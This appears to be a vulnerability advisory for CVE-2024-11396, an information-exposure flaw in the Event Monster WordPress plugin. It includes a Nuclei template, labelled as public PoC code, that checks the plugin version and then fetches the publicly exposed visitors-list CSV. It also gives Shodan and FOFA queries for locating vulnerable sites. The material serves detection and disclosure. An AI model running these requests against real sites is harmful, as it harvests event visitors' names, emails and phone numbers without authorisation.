The Event Monster Event Management, Tickets Booking, Upcoming Event plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.4.3 via the Visitors List Export file. During the export, a CSV file is created in the wp-content folder with a hardcoded filename that is publicly accessible. This makes it possible for unauthenticated attackers to extract data about event visitors, that includes first and last names, email, and phone number.
PoC代码[已公开]
id: CVE-2024-11396
info:
name: Event Monster <= 1.4.3 - Information Exposure Via Visitors List Export
author: s4e-io
severity: medium
description: |
The Event Monster Event Management, Tickets Booking, Upcoming Event plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.4.3 via the Visitors List Export file. During the export, a CSV file is created in the wp-content folder with a hardcoded filename that is publicly accessible. This makes it possible for unauthenticated attackers to extract data about event visitors, that includes first and last names, email, and phone number.
reference:
- https://github.com/RandomRobbieBF/CVE-2024-11396
- https://plugins.trac.wordpress.org/browser/event-monster/tags/1.4.3/em-ajax-prossesing/em-visitor-ajax.php#L92
- https://www.wordfence.com/threat-intel/vulnerabilities/id/0f522dfe-f2c2-4adb-980c-1f03d3c26e12?source=cve
- https://nvd.nist.gov/vuln/detail/CVE-2024-11396
- https://github.com/advisories/GHSA-6x4w-fvqp-6jvc
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2024-11396
cwe-id: CWE-359
epss-score: 0.41083
epss-percentile: 0.97306
metadata:
verified: true
max-request: 2
vendor: a-wp-life
product: event-monster
framework: wordpress
shodan-query: http.html:"wp-content/plugins/event-monster"
fofa-query: body="wp-content/plugins/event-monster"
tags: cve,cve2024,wordpress,wp,wp-plugin,event-monster,info-leak
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/event-monster/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'compare_versions(version, "<= 1.4.3")'
- 'contains(body, "event-monster")'
- 'status_code == 200'
condition: and
internal: true
extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"
- raw:
- |
GET /wp-content/uploads/visitors-list.csv HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body, "First Name, Last Name, Email, Phone, Event")'
- 'contains(content_type, "text/csv")'
- 'status_code == 200'
condition: and
# digest: 4a0a0047304502210087f02e21ade57176e5778aec415773821c7acae116b8810519108a5e17571767022005b8656bac3ef6ef20db1de13affb8fb4bf62bc5126a5009d43b2bf30374dcef:922c64590222798bb761d5b6d8e72950